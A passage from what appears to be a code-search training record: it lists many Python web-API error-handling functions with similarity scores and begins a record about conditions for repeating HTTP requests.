*args, **kwargs):\n out = None\n\n try:\n out = func(self, *args, **kwargs)\n\n # Catch the single exception that the user requested\n except exception as e:\n\n message = exception_label + str(e)\n if hasattr(e, \"status_code\"):\n error_code = getattr(e, \"status_code\")\n return send_error(self, message, error_code)\n else:\n return send_error(self, message)\n\n # Catch the basic API exception\n except RestApiException as e:\n\n if catch_generic:\n return send_error(self, e, e.status_code)\n else:\n raise e\n\n # Catch any other exception\n except Exception as e:\n if catch_generic:\n return send_error(self, e)\n else:\n raise e\n\n return out\n return wrapper\n return decorator", "def create_error_response(data: Dict[str, str], status_code: int) -> Response:\n resp = jsonify(data)\n resp.status_code = status_code\n return resp", "def handle_error(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def raise_for_json_status(self, response_data: JSON) -> None:\n status = response_data['status']\n if status != '1':\n message = response_data.get('message', 'No error message given')\n raise self.error_class(\n f'Error status \"{status}\" in JSON response: {message}'\n )", "def exceptionhandler(e):\n response = e.get_response()\n response.data = json.dumps({\n \"code\" : e.code,\n \"name\": e.name,\n \"description\": e.description\n })\n response.content_type = \"application/json\"\n\n return response", "def exceptions(e):\n ts = strftime('[%Y-%b-%d %H:%M]')\n tb = format_exc()\n app.logger.error('%s %s %s %s %s 5xx INTERNAL SERVER ERROR\\n%s',\n ts,\n request.remote_addr,\n request.method,\n request.scheme,\n request.full_path,\n tb)\n return jsonify(message=\"Internal Server Error\"), 500", "def handle_unknown_exception(exception):\n logger.exception(\"Unknown exception encountered:\")\n return Response(\n response=json.dumps(\n {\n \"value\": \"Amplium exception: %s\" % str(exception),\n \"status\": \"ERROR\"\n }\n ),\n status=500,\n mimetype=\"application/json\"\n )", "def invalid_response():\n return Response(\n '{\"error\": \"Invalid request\"}',\n status=400,\n mimetype='application/json'\n )", "def wrapper_view_error(\n view: Any = None, class_exception: Any = None, status: int = None\n) -> Any:\n\n def _decorate(function):\n @functools.wraps(function)\n def wrapped_function(*args, **kwargs):\n try:\n return function(*args, **kwargs)\n except class_exception as obj_exception:\n return Response(data={\"error\": obj_exception.message}, status=status)\n\n return wrapped_function\n\n if view:\n return _decorate(view)\n return _decorate", "def errors_api_wrapped(func):\n\n async def wrapped(self, *args, **kwargs):\n try:\n return await func(self, *args, **kwargs)\n except Exception as ex:\n message = getattr(ex, \"message\", None) or \"Something went wrong\"\n details = getattr(ex, \"details\", None) or str(ex)\n status_code = getattr(ex, \"status_code\", 500)\n logger.exception(\n \"Couldn't perform action: %s. Error: %s, Details: %s\", ex, message, details\n )\n return {\"message\": message, \"details\": details}, status_code\n\n return wrapped", "def internal_server_error(error): # pylint: disable=unused-argument\n response = jsonify(\n {\n \"success\": False,\n \"error_code\": 500,\n \"message\": \"Internal Server Error\",\n }\n )\n return response, 500", "def error_response(status_code, message=None):\n payload = {'error': str(status_code)+\" : \"+HTTP_STATUS_CODES.get(status_code, \"Unknown Error\")}\n if message:\n payload['message'] = message\n response = jsonify(payload)\n response.status_code = status_code\n return response", "def jsonify_unknown_exception(exception: Exception):\n current_app.logger.exception('Unhandled exception has been raised!')\n return jsonify(DEFAULT_MESSAGE, 500)", "def _gh_exception(exc_cls, status, data):\n try:\n exc = exc_cls(status, data, None)\n except TypeError:\n # Before PyGithub 1.5, GithubException had only two required arguments.\n exc = exc_cls(status, data)\n return exc", "def dispatch_request(self, *args, **kwargs):\n try:\n return super().dispatch_request(*args, **kwargs)\n except HTTPException as e:\n logger.error(\"HTTP Error on APIResource %s\", e, exc_info=1)\n return return_response({\n \"code\": e.code,\n \"message\": e.description\n }, e.code)\n except BaseException as e:\n logger.error(\"Error occurred in APIResource %s\", e, exc_info=1)\n return return_response({\n \"code\": 500,\n \"message\": str(e)\n }, 500)", "def wrap_pecan_controller_exception(func):\n\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except exc.QinlingException as e:\n LOG.error('Error during API call: %s', six.text_type(e))\n return webob.Response(\n status=e.http_code,\n content_type='application/json',\n body=json.dumps(dict(faultstring=six.text_type(e))),\n charset='UTF-8'\n )\n\n return wrapped", "def exception_handler(result, name=\"\"):\n try:\n response_content = result.json()\n # pylint: disable=broad-except\n except Exception:\n response_content = result.text\n\n exc_map = {\n 300: SFDC_MoreThanOneRecord,\n 400: SFDC_MalformedRequest,\n 401: SFDC_ExpiredSession,\n 403: SFDC_RefusedRequest,\n 404: SFDC_ResourceNotFound,\n }\n exc_cls = exc_map.get(result.status_code, SFDC_GeneralError)\n\n raise exc_cls(result.url, result.status_code, name, response_content)", "def http_error_handler(ex, req, resp, params):\n resp.body = encode.encode({\n 'status': 1,\n 'msg': 'HTTP error: ' + ex.status\n })", "def raise_for_status(response):\n http_error_msg = \"\"\n\n if 400 <= response.status_code < 500:\n http_error_msg = \"{} Client Error: {}\".format(\n response.status_code, response.reason\n )\n\n elif 500 <= response.status_code < 600:\n http_error_msg = \"{} Server Error: {}\".format(\n response.status_code, response.reason\n )\n\n if http_error_msg:\n try:\n more_info = response.json().get(\"message\")\n except ValueError:\n more_info = None\n if more_info and more_info.lower() != response.reason.lower():\n http_error_msg += \".\\n\\t{}\".format(more_info)\n raise requests.exceptions.HTTPError(http_error_msg, response=response)", "def bad_request_400(error):\n return jsonify({\n 'success': False,\n 'message': 'Bad request',\n 'error': 400\n }), 400", "def handle_500_error(_error):\n return make_response(jsonify(SERVER_ERROR), 500)", "def handle_exception(self, e):\n if isinstance(e, exceptions.APIException):\n return e.get_response(self.request)\n else:\n exc = exceptions.OtherException(self.request)\n return exc.get_response(self.request)", "def exceptions_to_http_status(view_func):\n @wraps(view_func)\n def inner(*args, **kwargs):\n \"\"\"\n Catch exceptions and convert them to django http response objects\n \"\"\"\n try:\n return view_func(*args, **kwargs)\n except DatabaseError as ex:\n return HttpResponseBadRequest(\"Database error: {}\".format(ex))\n except GeoServerError as ex:\n return HttpResponseBadRequest(\"GeoServer error: {}\".format(ex))\n except InvalidData as ex:\n return HttpResponseBadRequest(\"Invalid data: {}\".format(ex))\n except NotFoundError as ex:\n return HttpResponseBadRequest(\"Not found: {}\".format(ex))\n except SettingsError as ex:\n return HttpResponseBadRequest(\"Settings error: {}\".format(ex))\n except UploadError as ex:\n return HttpResponseBadRequest(\"Upload error: {}\".format(ex))\n except Exception:\n LOGGER.exception(\"Internal Server Error.\")\n return HttpResponseServerError(\"Internal Server Error. Please \"\n \"check your input parameters.\")\n return inner", "def error_response(http_response_code: Union[HTTPStatus, int], message: Text) -> JSONResponse:\n\n if isinstance(http_response_code, HTTPStatus):\n http_response_code = http_response_code.value\n\n return JSONResponse(dict(\n code=str(http_response_code),\n message=message\n ), http_response_code)", "def raise_error(self, err_code, response):\n clsname = str(self.__class__).split('.')[-1].split(\"'\")[0]\n raise ERROR_CODES[err_code](\n 'Response Type: \"%s\"\\tResponse: %s' % (\n clsname, response))", "def handle_error(self, e):\n code = getattr(e, 'code', 500) # Gets code or defaults to 500\n if code == 404:\n return self.make_response({\n 'message': 'not-found',\n 'code': 404\n }, 404)\n return super(MyApi, self).handle_error(e) # handle others the default way", "def raise_exception(self, code, rebrandly_response):\n if code == 200:\n return {\n 'status': 'ok',\n 'code': 200,\n 'response': rebrandly_response\n }\n # Everything went well, continue.\n elif code == 400:\n raise exc.BadRequestError(rebrandly_response.code, rebrandly_response.message)\n elif code == 401:\n raise exc.NotAuthorizedError(rebrandly_response.code, rebrandly_response.message)\n elif code == 403:\n if rebrandly_response.code == 'AlreadyExists':\n raise exc.AlreadyExistsError(rebrandly_response.code, rebrandly_response.message)\n else:\n raise exc.InvalidFormatError(rebrandly_response.code, rebrandly_response.message)\n if code == 404:\n raise exc.NotFoundError(rebrandly_response.code, rebrandly_response.message)\n if code == 500:\n raise exc.InternalServerError(rebrandly_response.code, rebrandly_response.message)\n if code == 502:\n raise exc.BadGatewayError(rebrandly_response.code, rebrandly_response.message)\n if code == 503:\n raise exc.APIUnavailableError(rebrandly_response.code, rebrandly_response.message)\n if code == 504:\n raise exc.APITimeoutError(rebrandly_response.code, rebrandly_response.message)", "def error_response(error_text):\n return Response(json.dumps({'error' : error_text}), status=404, mimetype='application/json')", "def handle_root_exception(error):\n code = 400\n if hasattr(error, 'code'):\n code = error.code\n d = dict(_error=str(error))\n s = json.dumps(d)\n return (s, code, [('Content-Type', 'application/json')])", "def code_exception_handler(exc, context):\n if isinstance(exc, Http404):\n exc = exceptions.NotFound()\n elif isinstance(exc, PermissionDenied):\n exc = exceptions.PermissionDenied()\n\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n if isinstance(exc.detail, (list, dict)):\n # get the Error codes instead of Error messages\n data = exc.get_codes()\n else:\n data = {'detail': exc.get_codes()}\n\n set_rollback()\n return Response(data, status=exc.status_code, headers=headers)\n\n return None", "def handle_exceptions(\n generic_message='An error has occurred',\n status_code=500,\n error_handler=None):\n @web.middleware\n async def middleware(request, handler):\n try:\n response = await handler(request)\n return response\n except web.HTTPException:\n raise\n except Exception as ex:\n message = str(ex)\n if error_handler:\n error_handler(request, ex)\n logging.exception('Error: %s', message)\n return web.json_response(\n {'error': generic_message},\n status=status_code\n )\n return middleware", "def internal_error_400(error):\n return jsonify({'error':\n \"Die Anfrage wurde syntaktisch falsch erstellt.\"}), 400", "def _raise_error(self, status: int, result: dict):\n raise APIError(status, self._get_error_text(result))", "def _request(self, method, *args, **kwargs):\n try:\n r = getattr(requests, method)(*args, **kwargs)\n except AttributeError:\n raise NewRelicException(\n 'Method {} is unsupported by requests module'\n .format(method)\n )\n except requests.exceptions.Timeout:\n raise Timeout('Request timed out after {} seconds'\n .format(self.timeout))\n\n if r.status_code < 200 or r.status_code > 299:\n # Try to work out all known errors into separate exceptions\n if r.status_code == 401:\n try:\n error_message = r.json()['error']['title']\n except (KeyError, ValueError):\n raise UnathorizedError(\n 'User is not authorized to perform requested operation'\n )\n else:\n raise UnathorizedError(error_message)\n if r.status_code == 402:\n raise ChecksLimitExceeded(\n \"Creating the monitor will increase your scheduled checks \"\n \"past your account's purchased check limit.\"\n )\n elif r.status_code == 404:\n try:\n error_message = r.json()['error']['title']\n except (KeyError, ValueError):\n raise ItemNotFoundError(\n 'Requested item not found. '\n 'No error message was provided by server.'\n )\n else:\n raise ItemNotFoundError(error_message)\n else:\n # If we don't know what to do with specific error code\n # ( most likely it's 400 )\n # We at least try to get error message from the response\n try:\n response_errors = r.json()['errors']\n raise NewRelicException(\n \"The following errors were returned by server:\\n{}\"\n .format('\\n'\n .join(\n [x['error'] for x in response_errors]\n ))\n )\n # Sometimes API does not return any useful information.\n # In this case that's just an HTML page\n # reporting 400 instead of JSON.\n # We will just return an error code in this case.\n except ValueError:\n raise NewRelicException(\n 'Got unexpected response code {}. '\n 'No additional information provided by server.'\n .format(r.status_code)\n )\n return r", "def handle_error(self, message):\n data = {\n \"success\": False,\n \"error\": message\n }\n\n return JsonResponse(data, status=200)", "def handle_api_error(resp):\n content = yield resp.json()\n\n headers = HeaderWrapper(resp.headers)\n\n try:\n err = content['error']\n except (KeyError, TypeError):\n raise error.APIError(\n \"Invalid response object from API: %r (HTTP response code \"\n \"was %d)\" % (content, resp.code),\n resp, resp.code, content, headers)\n\n if resp.code in [400, 404]:\n raise error.InvalidRequestError(\n err.get('message'), err.get('param'),\n resp, resp.code, content, headers)\n elif resp.code == 401:\n raise error.AuthenticationError(\n err.get('message'),\n resp, resp.code, content, headers)\n elif resp.code == 402:\n raise error.CardError(\n err.get('message'), err.get('param'), err.get('code'),\n content, resp.code, resp, headers)\n else:\n raise error.APIError(\n err.get('message'), content, resp.code, resp, headers)", "def format_exception(self):\n if isinstance(self.message, dict):\n return self.message, self.status_code\n return Request.format_exception(self.message, self.status_code)", "def raise_error(msg: str, code: int = 400) -> None:\n response = make_response(jsonify(message=msg), code)\n abort(response)", "def handle_exception(self,exc):\n logger.error(f\"Exception in request: {traceback.format_exc()}\")\n status_obj = status.HTTP_400_BAD_REQUEST\n if type(exc) is response.Http404:\n status_obj = status.HTTP_404_NOT_FOUND\n return Response(\n MediaUtil.generate_error_image(\n status_obj,\n str(exc),\n self.request.accepted_renderer.format),\n status=status_obj)", "def json_or_error(response):\n if 200 <= response.status_code < 300:\n if response.content:\n return response.json()\n else:\n # Response has no body. Return a status in a way that is consistent with other requests\n return {\n 'status': 'SUCCESS',\n 'httpStatusCode': response.status_code,\n 'httpStatus': httplib.responses[response.status_code],\n }\n else:\n raise JsonApiError('API request to {} failed with HTTP status {}: {}'.format(\n response.url, response.status_code, response.text))", "def raise_for_status(response: Response):\n\n if response.status_code != 200:\n error_body = response.json()['error']\n code = error_body['code']\n message = error_body['message']\n description = error_body['description']\n\n raise TradeException(status_code=response.status_code, code=code,\n message=message,\n description=description)\n\n return response", "def internal_server_error(error):\n return flask.jsonify({\"error\": \"Internal Server Error\"}), 500", "def error(msg=\"Invalid query\", code=400):\n\tjson = {'error': msg}\n\t#return jsonify(json), code\n\tabort(make_response(jsonify(json), code))" ]
[ "0.73746616", "0.73421353", "0.73373085", "0.7094187", "0.7060387", "0.70266795", "0.7011387", "0.69837064", "0.69805527", "0.6943718", "0.6921114", "0.6909217", "0.69065756", "0.6879482", "0.67980826", "0.67973834", "0.67954606", "0.678849", "0.6778472", "0.67188394", "0.67105824", "0.6700431", "0.66831297", "0.6679369", "0.66791004", "0.66744596", "0.66729754", "0.6670976", "0.66583186", "0.66565096", "0.66353446", "0.6634591", "0.6633283", "0.66218936", "0.6616202", "0.6611066", "0.6598119", "0.65927106", "0.65908086", "0.6584683", "0.6582393", "0.65622807", "0.65528923", "0.65528244", "0.65460455", "0.6546045", "0.6543433", "0.6530074", "0.65222096", "0.651461", "0.6490732", "0.6467759", "0.64566946", "0.6448714", "0.644656", "0.6440691", "0.64270705", "0.642577", "0.64173037", "0.6409432", "0.64067024", "0.6406649", "0.63916385", "0.6390292", "0.63892907", "0.636886", "0.6360966", "0.6360625", "0.63553375", "0.634025", "0.6333507", "0.6321357", "0.6314338", "0.62989813", "0.6293148", "0.6288705", "0.62875783", "0.6282675", "0.62791497", "0.627823", "0.6277433", "0.6275079", "0.6271917", "0.6270765", "0.62686294", "0.6268288", "0.62582517", "0.6245229", "0.6233216", "0.6231365", "0.62311053", "0.6230973", "0.62295306", "0.62171805", "0.62168306", "0.62118", "0.6210882", "0.62053907", "0.6204348", "0.6204135", "0.61909294" ]
0.0
-1
Conditions for repeating a request. If it returns True, the request will be repeated.
def retry_request( self, tapi_exception, error_message, repeat_number, response, request_kwargs, api_params, **kwargs ): return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _do_request(self):\n\n if time.time() < self._next_request:\n return False\n else:\n return True", "def valid_in_request(self):\n return self._repeatable[0] is not None", "def valid_multiple_in_request(self):\n return self._repeatable[0] is True", "def valid_in_response(self):\n return self._repeatable[1] is not None", "def only_once(self) -> bool:\n return self.times == 1", "def valid_multiple_in_response(self):\n return self._repeatable[1] is True", "def is_repetition(self):\n return self.id == 1", "def request_seen(self, request):\n fp = request_fingerprint(request)\n if self.server.sismember(self.key, fp):\n return True\n self.server.sadd(self.key, fp)\n return False", "def request_seen(self, request):\n fp = request_fingerprint(request)\n # This returns the number of values added, zero if already exists.\n added = self.server.sadd(self.key, fp)\n return added == 0", "def addRequest(self, userId):\n flag = False\n requestTimes = self.verifyLog(userId)\n\n if requestTimes == 0:\n self.addLog(userId)\n flag = True\n elif requestTimes < 5:\n flag = True\n\n if flag:\n self.increaseTimes(userId)\n\n return flag", "def get_repeat(self) -> bool:\n return self._select_interface(self._rc_get_repeat,\n self._http_get_repeat)", "def _unique_build_request(buildername, revision):\n global SCHEDULING_MANAGER\n sch_mgr = SCHEDULING_MANAGER\n\n if is_downstream(buildername):\n return True\n else:\n if revision in sch_mgr and buildername in sch_mgr[revision]:\n LOG.info(\"We have already scheduled the build '%s' for \"\n \"revision %s during this session. We don't allow \"\n \"multiple requests.\" % (buildername, revision))\n return False\n else:\n if revision not in sch_mgr:\n sch_mgr[revision] = []\n\n sch_mgr[revision].append(buildername)\n return True", "def testReplyWhenRequestAlreadyExecuted(looper, nodeSet, client1, sent1):\n # Since view no is always zero in the current setup\n looper.run(eventually(checkSufficientRepliesRecvd,\n client1.inBox,\n sent1.reqId,\n 2,\n retryWait=.5,\n timeout=5))\n originalRequestResponsesLen = nodeCount * 2\n duplicateRequestRepliesLen = nodeCount # for a duplicate request we need to\n client1.nodestack._enqueueIntoAllRemotes(sent1, None)\n\n def chk():\n assertLength([response for response in client1.inBox\n if (response[0].get(f.RESULT.nm) and\n response[0][f.RESULT.nm][f.REQ_ID.nm] == sent1.reqId) or\n (response[0].get(OP_FIELD_NAME) == REQACK and\n response[0].get(f.REQ_ID.nm) == sent1.reqId)],\n originalRequestResponsesLen + duplicateRequestRepliesLen)\n\n looper.run(eventually(\n chk,\n retryWait=1,\n timeout=20))", "def test_request_created_once(self):\n\n usual_user = UserFactory(\n username='Usual User',\n email='[email protected]',\n )\n token = Token.objects.get(user=usual_user)\n self.client.credentials(\n HTTP_AUTHORIZATION=f'Token {token.key}')\n data = {'team': self.team.id}\n self.client.post(reverse('api:user-team-requests-list'), data=data) # first request\n response = self.client.post(reverse('api:user-team-requests-list'), data=data) # second request\n self.assertEqual(response.status_code, forum_status.STATUS_222_USER_ALREADY_REQUESTED)", "def everytime(self):\n return True", "def should_refresh_client_fnc(response):\n return not response", "def is_once(self):\n return self.subscription_list.mode == gnmi_pb2.SubscriptionList.ONCE", "def _repeat(a, repeats, batch_size, training_batch_size):\n return tf.cond(tf.equal(batch_size, 1),\n lambda: utility.repeat(a, repeats, num_repeats=2),\n lambda: utility.repeat(a, repeats, training_batch_size))", "def _result_already_returned(self):\n return self.deferred.called", "def __call__(self):\n hub.sleep(random.randint(1, self.interval))\n while True:\n self.send_req()\n self.reply_pending = True\n hub.sleep(self.interval)\n if self.reply_pending:\n self.no_response()", "def would_retransmit(self):\n return not self.my_pending_requests.is_empty()", "def check_repeated_task(self, task):\n task_status = task in self.tasks_asked\n\n # append if never asked\n if task_status == False:\n self.tasks_asked.append(task)\n\n return task_status", "def check_for_requests(self):\n while True:\n doc = self.cc.requests_coll.find_one_and_delete(\n {'receiver': 'validator'}, sort=[('_id', pymongo.ASCENDING)]\n )\n if doc is None:\n break\n\n if doc['action'] == 'validate_upload':\n print(\"fulfil request: set valid: {} for upload_id {}\".format(doc['valid'], doc['upload_id']))\n self.validate_upload(ObjectId(doc['upload_id']), doc['valid'])", "def apiCallRepeater(repeatList):\n confirm = input(\"We're about to make \" + str(len(repeatList)) + \" API calls, is this OK? (Y/N) > \")\n if confirm == \"Y\" or confirm == 'y':\n print(\"OK\")\n accts = fetchById(repeatList)\n return accts\n else:\n print('K, byeeee')\n sys.exit()", "def _may_cache(self, request, response=None):\n # any successful request may be cached\n return ((HTTPStatus.OK <= response.status_code < HTTPStatus.BAD_REQUEST)\n if response else True)", "def is_duplicate(self, event):\n # only checking remote and expected remote for the endpoint. We don't care about names,\n # interfaces/tunnels, or pctags for dup stale suppression\n return (self.remote == event.remote and self.expected_remote == event.expected_remote)", "def should_reschedule(self, iteration):\n if not self.max_iterations:\n return True\n return iteration < self.max_iterations", "def is_rate_validated(from_no):\n from_key_time = \"from_time_\"+from_no\n from_key_count = \"from_count_\" + from_no\n\n if not get_cache(from_key_time) or not get_cache(from_key_count):\n set_cache(from_key_time, time.time())\n set_cache(from_key_count, 1)\n return True\n cached_time = get_cache(from_key_time)\n time_diff = time.time() - cached_time\n cached_count = get_cache(from_key_count)\n\n if time_diff < RATE_LIMIT_DURATION and cached_count >= RATE_LIMIT_COUNT:\n return False\n elif time_diff > RATE_LIMIT_DURATION:\n set_cache(from_key_time, cached_time + RATE_LIMIT_DURATION)\n set_cache(from_key_count, 1)\n return True\n else: # cached_count < RATE_LIMIT_COUNT\n # print(\"hit from -%s, count - %s\" % (from_no,cached_count))\n set_cache(from_key_count, cached_count+1)\n return True", "def is_repeat(self, state):\n\t\tif not self.state.repeats():\n\t\t\treturn False\n\t\treturn state.repeated_rep() in self.visitedStates", "def request_safe(self, url_request_safe, method='GET', headers_request_safe=None, data_request_safe=None, params_request_safe=None, mood_looptry=False, stream_request_safe=False):\n while True:\n if method == 'GET':\n tic = time.time()\n try:\n res_request_safe = self.session.get(\n url_request_safe,\n headers=headers_request_safe,\n stream=stream_request_safe,\n params=params_request_safe,\n timeout=4\n )\n except requests.exceptions.Timeout:\n self.time_request.append(time.time()-tic)\n print('time out request')\n continue\n self.time_request.append(time.time()-tic)\n # status code filter\n if res_request_safe.status_code in [500,560]:\n print(f'{res_request_safe.status_code} status code')\n time.sleep(2)\n continue\n return True, res_request_safe\n elif method == 'POST':\n tic = time.time()\n try:\n res_request_safe = self.session.post(\n url_request_safe,\n headers=headers_request_safe,\n data=data_request_safe,\n stream=stream_request_safe,\n params=params_request_safe\n )\n except requests.exceptions.Timeout:\n self.time_request.append(time.time()-tic)\n print('time out request')\n continue\n self.time_request.append(time.time()-tic)\n # status code filter\n if res_request_safe.status_code in [500]:\n print(f'{res_request_safe.status_code} status code')\n time.sleep(2)\n continue\n return True, res_request_safe", "async def __call__(self, request, **kwargs):\n cache_key = kwargs.pop('cache_key', None)\n sticky_key = kwargs.pop('sticky_key', None)\n cache_revalidate = kwargs.pop('cache_revalidate', None)\n if cache_key is not None and sticky_key is not None:\n raise AssertionError(\n 'expect at most one: cache_key=%r, sticky_key=%r' %\n (cache_key, sticky_key)\n )\n if cache_key is not None:\n return await self._try_cache(\n self._cache,\n cache_key,\n cache_revalidate,\n request,\n kwargs,\n )\n if sticky_key is not None:\n return await self._try_cache(\n self._unbounded_cache,\n sticky_key,\n cache_revalidate,\n request,\n kwargs,\n )\n\n circuit_breaker_key = kwargs.pop('circuit_breaker_key', None)\n if circuit_breaker_key is None:\n circuit_breaker_key = urllib.parse.urlparse(request.url).netloc\n\n breaker = self._circuit_breakers.get(circuit_breaker_key)\n for retry_count in itertools.count():\n\n # Check rate limit out of the breaker async-with context to\n # avoid adding extra delay in the context so that, when the\n # breaker is in YELLOW state, another request may \"go\" into\n # the context as soon as the previous one completes.\n await self._rate_limit()\n\n async with breaker:\n response, backoff = await self._loop_body(\n request, kwargs, breaker, retry_count\n )\n if response is not None:\n return response\n\n # Call `sleep` out of the breaker async-with context for the\n # same reason above.\n await timers.sleep(ASSERT.not_none(backoff))\n\n ASSERT.unreachable('retry loop should not break')", "def getAllowRepetition(self):\n return self.__allowRepetition", "def call_once(self, request=None, *args, **kwargs):\n if request is not None:\n self.request = request\n\n config = self.request.configuration\n if config.http_method != EBConsts.HTTP_METHOD_POST or config.method != EBConsts.METHOD_REST:\n raise Error('Not implemented yet, only REST POST method is allowed')\n\n url = self.request.url if self.request.url is not None else self.build_url()\n logger.debug(\"URL to call: %s\", url)\n\n # Do the request\n resp = requests.post(url, json=self.request.body, timeout=config.timeout, headers=self.request.headers)\n self.last_resp = resp\n return self.check_response(resp)", "def check_if_should_respond(self, has_been_mentioned) -> bool:\n should_respond = random.random() < self.response_chance\n\n return should_respond", "def request() -> None:\n\t_flag.set()", "def isRepeated(self):\n return self._field.label == FieldDescriptor.LABEL_REPEATED", "def check_inflight_already_running(self, user: Identifier) -> bool:\n with self._lock:\n for flow in self.in_flight:\n if flow.requestor == user:\n return True\n return False", "def _is_follow_request(environ, result):\n r = Request(environ)\n if r.params.get(\"action\") == \"follow\":\n return True\n else:\n return False", "def _is_limited(request, rate, rl):\n def inner(*args, **kwargs):\n is_limited = rl.is_limited(*args, **kwargs)\n\n if is_limited:\n messages.error(\n request,\n _(\"Too many submissions, wait %(time)s.\") % {\n 'time': rate.split('/')[1]})\n\n return is_limited\n\n return inner", "def can_i_create_claim(self, request):\n\n ip = get_client_ip(request)\n stored = self._get(ip)\n\n if not stored or type(stored) != list:\n self._set(ip, [time.time()])\n return True\n else:\n stored.append(time.time())\n self._set(ip, stored)\n\n # return not len(stored) > settings.CLAIMS_PER_HOUR\n return not len(stored) > self.moderator.claims_per_hour", "def over_request_limit(last_request: datetime) -> bool:\n if last_request is None:\n return False\n if last_request is not None and isinstance(last_request, datetime) and last_request < datetime.utcnow():\n difference = datetime.utcnow() - last_request\n return difference.seconds < current_app.config['TIME_BETWEEN_REQUESTS']\n return True", "def rate_limiting(cls):\n this_click_time = time.time()\n time_to_last_click = None\n if cls.last_click_time:\n time_to_last_click = this_click_time - cls.last_click_time\n cls.last_click_time = this_click_time\n return time_to_last_click and time_to_last_click < 0.7", "def repeat_every(repeats=5, every=2):\n\n def repeat_wrapper(func):\n @functools.wraps(func)\n def func_wrapper(*args, **kwargs):\n for _ in range(repeats):\n value = func(*args, **kwargs)\n if value:\n return value\n time.sleep(every)\n\n return func_wrapper\n\n return repeat_wrapper", "def repeat(self):\n return self._get('repeat')", "def can_request_more():\n # Note: Files are restored in pairs (so we multiply by 2)\n active_requests = jobtracker.query(\"SELECT IFNULL(SUM(numrequested), 0) \" \\\n \"FROM requests \" \\\n \"WHERE status='waiting'\", fetchone=True)\n to_download = jobtracker.query(\"SELECT * FROM files \" \\\n \"WHERE status NOT IN ('downloaded', \" \\\n \"'added', \" \\\n \"'deleted', \" \\\n \"'terminal_failure')\")\n if active_requests == None:\n\tactive_requests = 0\n num_to_restore = active_requests\n num_to_download = len(to_download)\n used = get_space_used()\n reserved = get_space_committed()\n\n can_request = ((num_to_restore+num_to_download) < config.download.numrestored) and \\\n (used+reserved < config.download.space_to_use)\n return can_request", "def repeat(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"repeat\")", "def retry(times):\n return repeat_with_success_at_least(times, 1)", "def skip(self):\n if not self.helper_view.newDataOnly():\n return False\n\n if self.request.steps[-1].startswith(\"++add++\"):\n return False\n if self.request.method != \"PATCH\":\n # restapi calls\n return False\n return True", "def test_api_requests_limited(self):\n\n did_reach_rate_limit = False\n for _ in range(110):\n response = self.send_get('Participant', expected_status=None)\n if response.status_code == TooManyRequests.code:\n did_reach_rate_limit = True\n break\n\n self.assertTrue(did_reach_rate_limit)", "def partial(self):\n return (self.id == 0)", "def requested() -> bool:\n\treturn _flag.is_set()", "def testReponse(question, reponse):\r\n if reponse == question[5]:\r\n return True\r\n else:\r\n return False", "def use_proxy(self, request):\n if self.adsl:\n return True\n if \"depth\" in request.meta and int(request.meta['depth']) <= 2:\n return False\n i = random.randint(1, 10)\n return i <= 2", "def use_proxy(self, request):\n #if \"depth\" in request.meta and int(request.meta['depth']) <= 2:\n # return False\n #i = random.randint(1, 10)\n #return i <= 2\n return True", "def repeat_donor(self, name, zip_code, year):\n donor = Donor(name, zip_code)\n if donor in self.repeat:\n self.repeat[donor].add(year)\n for y in self.repeat[donor]:\n if y < year:\n return True\n return False\n else:\n self.repeat[donor] = {year}\n return False", "def check_loop(\n url, period=5, timeout=10, body_check_re='',\n producer=None, oneshot=False):\n while True:\n worker = threading.Thread(target=check, kwargs={\n 'url': url,\n 'timeout': timeout,\n 'body_check_re': body_check_re,\n 'producer': producer,\n })\n logger.info('check url=%s' % url)\n worker.start()\n time.sleep(period)\n if oneshot:\n return", "def request_already_queued(self, request: str):\n try:\n self.create_request_queue_if_not_exists()\n queue = []\n db = self.get_db_safely()\n cursor = db.cursor()\n cursor.execute(\n \"\"\"SELECT rowid FROM queue WHERE request = ?\"\"\",\n (request,))\n for row in cursor:\n queue.append(row)\n if len(queue) == 0:\n return False\n else:\n return True\n except sqlite3.Error:\n # This is a lie, but we don't want to try and enqueue something if we got an error here.\n return True", "def repeat(times, intensive_times=None):\n if intensive_times is None:\n return repeat_with_success_at_least(times, times)\n\n casual_test = bool(int(os.environ.get('CUPY_TEST_CASUAL', '0')))\n times_ = times if casual_test else intensive_times\n return repeat_with_success_at_least(times_, times_)", "def valid(self):\r\n return self.resumable and self.sessionID", "def use_proxy(self, request):\n # if \"depth\" in request.meta and int(request.meta['depth']) <= 2:\n # return False\n # i = random.randint(1, 10)\n # return i <= 2\n return True", "def is_rate_limit_exceeded(self, request):\r\n counts = self.get_counters(request)\r\n return sum(counts.values()) >= self.requests", "def data_ready(req, cache):\n if not isinstance(req, list):\n req = [req]\n return all([r in cache for r in req])", "def log_once(key):\r\n\r\n global _last_logged\r\n\r\n if _disabled:\r\n return False\r\n elif key not in _logged:\r\n _logged.add(key)\r\n _last_logged = time.time()\r\n return True\r\n elif _periodic_log and time.time() - _last_logged > 60.0:\r\n _logged.clear()\r\n _last_logged = time.time()\r\n return False\r\n else:\r\n return False", "def retry(self):\n return False", "def check_already_scraped(self, season_title, competition_title, event_title, event_gender, round_title,\n instance_of_event_in_competition) -> bool:\n if len(self.already_scraped[(self.already_scraped['season'] == season_title) &\n (self.already_scraped['competition'] == competition_title) &\n (self.already_scraped['event'] == event_title) &\n (self.already_scraped['instance_of_event_in_competition'] ==\n instance_of_event_in_competition) &\n (self.already_scraped['gender'] == event_gender) &\n (self.already_scraped['round'] == round_title)]):\n self.log(message=f\"Round already discovered: {season_title}-{competition_title}-\"\n f\"{event_title}-{instance_of_event_in_competition}-\"\n f\"{event_gender}-{round_title}\",\n level=INFO)\n return True\n self.log(message=f\"New round discovered: {season_title}-{competition_title}-\"\n f\"{event_title}-{instance_of_event_in_competition}-\"\n f\"{event_gender}-{round_title}\",\n level=INFO)\n return False", "def test_request_retries(self, nosleep, method):\n # Dummies for K8s API URL and `requests` session.\n url = 'http://localhost:12345/'\n client = k8s.requests.Session()\n\n # Test function must not return a response but indicate an error.\n ret = k8s.request(client, method, url, None, None)\n assert ret == ({}, True)\n\n # Windows is different. No idea 